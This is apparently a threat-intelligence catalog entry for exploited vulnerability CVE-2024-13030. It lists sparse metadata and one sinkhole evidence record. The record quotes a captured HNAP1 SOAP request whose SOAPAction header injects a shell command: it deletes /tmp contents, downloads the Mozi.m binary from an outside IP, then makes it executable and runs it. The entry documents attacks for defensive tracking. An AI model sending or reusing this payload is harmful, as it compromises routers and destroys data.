CVE-2024-13030

Known Exploited Vulnerability Entry External Catalog

Entry Details

CVE-2024-13030

Confirmed

Yes

2026-03-12 10:49 UTC


Characteristics

Yes

No

Remote

100.0


Timestamps

2026-03-12

2026-03-12

2026-03-12


7e778c2d-cf27-4c9c-9fe6-fc01102b5431

1a89b78e-f703-45f3-bb86-59eb712668bd

2026-03-12 10:53 UTC

2026-03-12 10:49 UTC

Evidence (1)
Type Source Signal Confidence Details GCVE Metadata
sinkhole cti-feed.circl.lu in_the_wild_attempts 1.00
View details
{
  "note": "OST /HNAP1/ HTTP/1.0\r\nHost: 193.168.113.145:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp \u0026\u0026 rm -rf * \u0026\u0026 wget http://180.243.2.45:51387/Mozi.m \u0026\u0026 chmod 777 /tmp/Mozi.m \u0026\u0026 /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n\u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"\u003e\r\n\u003csoap:Body\u003e\u003cAddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"\u003e\r\n\u003cPortMappingDescription\u003efoobar\u003c/PortMappingDescription\u003e\r\n\u003cInternalClient\u003e192.168.0.100\u003c/InternalClient\u003e\r\n\u003cPortMappingProtocol\u003eTCP\u003c/PortMappingProtocol\u003e\r\n\u003cExternalPort\u003e1234\u003c/ExternalPort\u003e\r\n\u003cInternalPort\u003e1234\u003c/InternalPort\u003e\r\n\u003c/AddPortMapping\u003e\u003c/soap:Body\u003e\u003c/soap:Envelope\u003e"
}
-